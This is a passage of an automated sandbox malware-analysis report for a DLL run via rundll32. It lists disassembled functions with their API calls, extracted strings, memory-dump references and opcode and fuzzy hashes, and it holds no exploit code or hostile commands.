                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_
                                                                    • String ID:
                                                                    • API String ID: 1323251999-0
                                                                    • Opcode ID: 3c25c5139425b86a69570f3ea7bfe5f9e35514b2fd4d6475dddec9d8463ea4d5
                                                                    • Instruction ID: a3aee414e32e9e444ec31bcd03afe77f738e53271e4cc4d6c4276915251da715
                                                                    • Opcode Fuzzy Hash: 3c25c5139425b86a69570f3ea7bfe5f9e35514b2fd4d6475dddec9d8463ea4d5
                                                                    • Instruction Fuzzy Hash: 8A21A1B6B1AA85A4EF14CE12D1802BD6321FB84FC4F14D031EAAE07B59DF2DD889C354
                                                                    Function 00007FF8A8D011FC Relevance: 6.1, APIs: 4, Instructions: 57COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Locinfostd::_$GetctypeGetcvtLocinfo::_Locinfo::~_
                                                                    • String ID:
                                                                    • API String ID: 2826301415-0
                                                                    • Opcode ID: 1e99d4342cd29dba36445c3b1607530a25047ece4bcb5873c18625d63b8535b3
                                                                    • Instruction ID: 36b86b2b2426bfa6068bd6051e55250d75bfbb3e22dfb3549850b543bf813e99
                                                                    • Opcode Fuzzy Hash: 1e99d4342cd29dba36445c3b1607530a25047ece4bcb5873c18625d63b8535b3
                                                                    • Instruction Fuzzy Hash: 00217F22A0AB8592EB20CF28D4013A97770FB98BD4F409335DAAD536A6EF3CD595C750
                                                                    Function 00007FF8A8D0AAD4 Relevance: 6.0, APIs: 4, Instructions: 47processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 3629628435-0
                                                                    • Opcode ID: d4961eedb22df2be85cba4189b959a7d20de85ac4467c504b93b6443318c4265
                                                                    • Instruction ID: 11b5ec630f0a22b4ab9aada274af5f91a5100c8bf3e1eac911efd7a6d1884036
                                                                    • Opcode Fuzzy Hash: d4961eedb22df2be85cba4189b959a7d20de85ac4467c504b93b6443318c4265
                                                                    • Instruction Fuzzy Hash: B011513570D641D1EB24DB21E48426A73A1FB88BD0F444235DDAD47798DF3CE509CB14
                                                                    Function 00007FF8A8D56DCC Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ConditionMask$InfoVerifyVersion
                                                                    • String ID:
                                                                    • API String ID: 2793162063-0
                                                                    • Opcode ID: 99230b27dbe4b2c95b5bed9331070829a79ef9e9bc114238ee211ec093b0693d
                                                                    • Instruction ID: 593cceba8c52b38b8db63626ba07e1d1763f5bf0589e29b88ce3531657f482e5
                                                                    • Opcode Fuzzy Hash: 99230b27dbe4b2c95b5bed9331070829a79ef9e9bc114238ee211ec093b0693d
                                                                    • Instruction Fuzzy Hash: 45119132605B41CAD720CF70E8413EAB3A0FB88B88F044134EA8D4B718EF3CD5588B54
                                                                    Function 00007FF8A8D68760 Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,00007FF8A8D68809), ref: 00007FF8A8D68777
                                                                    • HeapAlloc.KERNEL32(?,?,?,?,?,?,?,00007FF8A8D68809), ref: 00007FF8A8D68788
                                                                    • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF8A8D687A0
                                                                    • throw_exception.LIBCPMT ref: 00007FF8A8D687A9
                                                                      • Part of subcall function 00007FF8A8D3C8D0: enable_error_info.LIBCPMT ref: 00007FF8A8D3C8EA
                                                                      • Part of subcall function 00007FF8A8D3C8D0: _CxxThrowException.LIBVCRUNTIME ref: 00007FF8A8D3C909
                                                                      • Part of subcall function 00007FF8A8D3C8D0: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,00007FF8A8D2DA0C), ref: 00007FF8A8D3C927
                                                                      • Part of subcall function 00007FF8A8D3C8D0: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,00007FF8A8D2DA0C), ref: 00007FF8A8D3C938
                                                                      • Part of subcall function 00007FF8A8D3C8D0: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF8A8D3C950
                                                                      • Part of subcall function 00007FF8A8D3C8D0: throw_exception.LIBCPMT ref: 00007FF8A8D3C959
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocProcessstd::bad_alloc::bad_allocthrow_exception$ExceptionThrowenable_error_info
                                                                    • String ID:
                                                                    • API String ID: 2554138254-0
                                                                    • Opcode ID: 62e3ad041dfcc6aefaaf70c5f66321e6d2c8053afacea2e9eb2edb1585a4e4ce
                                                                    • Instruction ID: bb711ab1b377e8eff58fefb9c7b69039db063deebd1fedbeccaf29ccd555e191
                                                                    • Opcode Fuzzy Hash: 62e3ad041dfcc6aefaaf70c5f66321e6d2c8053afacea2e9eb2edb1585a4e4ce
                                                                    • Instruction Fuzzy Hash: C5018832A0AB8191EB10DF25B9001696370FB997E4F449334EAAD43796FF7CE1A4C714
                                                                    Function 00007FF8A8D3C910 Relevance: 6.0, APIs: 4, Instructions: 34memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocExceptionProcessThrowenable_error_infostd::bad_alloc::bad_allocthrow_exception
                                                                    • String ID:
                                                                    • API String ID: 567531190-0
                                                                    • Opcode ID: 01e0b1f7d15ae3e205be57a387aae64765740c4bca03fb4cb3ff0d67c3f455c9
                                                                    • Instruction ID: 8a79c22a9c91f157aa5e4d6fc83f95cca036c184d34c60d1e6ec382f556eb240
                                                                    • Opcode Fuzzy Hash: 01e0b1f7d15ae3e205be57a387aae64765740c4bca03fb4cb3ff0d67c3f455c9
                                                                    • Instruction Fuzzy Hash: CBF0363260BB4191EB109F65F80051963A4FB88BF4F544234DAAD43795FF7CD154C714
                                                                    Function 00007FF8A8D278A4 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 437COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00007FF8A8D15270: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF8A8D152DF
                                                                      • Part of subcall function 00007FF8A8D15270: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF8A8D15394
                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00007FF8A8D27F43
                                                                      • Part of subcall function 00007FF8A8D9CA10: std::ios_base::_Tidy.LIBCPMT ref: 00007FF8A8D9CA35
                                                                    Strings
                                                                    • c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\RegistryKey.h, xrefs: 00007FF8A8D278B0
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: LockitLockit::~_std::_std::ios_base::_$Ios_base_dtorTidy
                                                                    • String ID: c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\RegistryKey.h
                                                                    • API String ID: 1721638112-3002699068
                                                                    • Opcode ID: b96285b4551687ba9a6acca6d4b0652b2b1cff6adee2ddd95c6eb57c41b97d3b
                                                                    • Instruction ID: 07db2decc8052232d1af27b25ab23533e80a098b7c166ae2c567619ebd07d777
                                                                    • Opcode Fuzzy Hash: b96285b4551687ba9a6acca6d4b0652b2b1cff6adee2ddd95c6eb57c41b97d3b
                                                                    • Instruction Fuzzy Hash: 85125A72A0AA86A6DF20DF25D8942AD6361FB84BC4F448122DE6E477A5EF3CD509C314
                                                                    Function 00007FF8A8D02F60 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 217COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • std::locale::_Init.LIBCPMT ref: 00007FF8A8D031AB
                                                                      • Part of subcall function 00007FF8A8D9B360: std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 00007FF8A8D9B395
                                                                      • Part of subcall function 00007FF8A8D9B360: std::locale::_Setgloballocale.LIBCPMT ref: 00007FF8A8D9B3A0
                                                                      • Part of subcall function 00007FF8A8D9B360: _Yarn.LIBCPMT ref: 00007FF8A8D9B3B7
                                                                      • Part of subcall function 00007FF8A8D9B360: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF8A8D9B404
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: std::locale::_$InitLocimpLocimp::_LockitLockit::~_New_SetgloballocaleYarnstd::_
                                                                    • String ID: class$const
                                                                    • API String ID: 1441820753-3992238299
                                                                    • Opcode ID: 1878a3f0d5078fb0a05ebda721c5d5a39939ebdb12e0501878fa442cac1c30aa
                                                                    • Instruction ID: 7bc6172af267cb1122297c71b7ae80ff9ff41fb406e703942473336ba0795e92
                                                                    • Opcode Fuzzy Hash: 1878a3f0d5078fb0a05ebda721c5d5a39939ebdb12e0501878fa442cac1c30aa
                                                                    • Instruction Fuzzy Hash: FA81D522B0BA45A5EB14DFA6D4001BC2371EB49BC8F844532DA2F07784DF7CE65AC369
                                                                    Function 00007FF8A8D23148 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 187COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Xinvalid_argumentstd::_
                                                                    • String ID: map/set<T> too long$void __cdecl Nvidia::Logging::RegistryKey::CheckErrorCode(long,const char *)
                                                                    • API String ID: 909987262-3918231815
                                                                    • Opcode ID: 5b633b0ad264ce31a833bf02233dd9e486a98662492c48b28d3cf40de160dccd
                                                                    • Instruction ID: d22250cbac1f24f17aa0789c9e95cf77cc8a3370041efc9f85128322999baed3
                                                                    • Opcode Fuzzy Hash: 5b633b0ad264ce31a833bf02233dd9e486a98662492c48b28d3cf40de160dccd
                                                                    • Instruction Fuzzy Hash: A391247360AB88D0DB18CB19D08012CBBA5F794F94B65D42ACBAD073B4EF79D8A5C354
                                                                    Function 00007FF8A8DCAF88 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 176COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID: *
                                                                    • API String ID: 3215553584-163128923
                                                                    • Opcode ID: ffb71dcfec2fdb1fba3e49d443df1eba83977a9d0cdf083cb99d37a18518271c
                                                                    • Instruction ID: 9ef7dfa4478f807bcae0fc4aff1d61e66514bc9f77a46ba09af24735f391eb5f
                                                                    • Opcode Fuzzy Hash: ffb71dcfec2fdb1fba3e49d443df1eba83977a9d0cdf083cb99d37a18518271c
                                                                    • Instruction Fuzzy Hash: 4E71C8F290A612D6EB688F3A845403C3BA0FB45BD8F241135DB6E43294DF38E489D738
                                                                    Function 00007FF8A8D81190 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 122COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: wcsftime
                                                                    • String ID: %Y-%m-%dT%H:%M:%S$NGUgNGMgNTMgMzEgMmUgMzA
                                                                    • API String ID: 2902305603-1341811953
                                                                    • Opcode ID: f29c5a4e593acd43bef6f4edfe64a28282b63c8cd4e63881856728f5847b26e3
                                                                    • Instruction ID: 34e1cb395363160578021e5c78b1f24b885afbaf03422f7b0b83ed201d843355
                                                                    • Opcode Fuzzy Hash: f29c5a4e593acd43bef6f4edfe64a28282b63c8cd4e63881856728f5847b26e3
                                                                    • Instruction Fuzzy Hash: 8351E361E0E686A5FB20DB25E4503B96750FF90BD4F444131DEAD83696EF3CE409C728
                                                                    Function 00007FF8A8D073C4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateFileHandle
                                                                    • String ID: .log
                                                                    • API String ID: 3498533004-299349702
                                                                    • Opcode ID: 55d1a9028f26af799bb06fc40ccd591269aa111893101cd608a499a98079780f
                                                                    • Instruction ID: 9b6c0eb4df05f102696e0a0612465498d399c53969b3d6005264a8bb549d6da7
                                                                    • Opcode Fuzzy Hash: 55d1a9028f26af799bb06fc40ccd591269aa111893101cd608a499a98079780f
                                                                    • Instruction Fuzzy Hash: C441E032606B02A6EB10DF31D4942AC23B0FB45BD8F406235DA2E5BB95DF3DE529C318
                                                                    Function 00007FF8A8D51C54 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
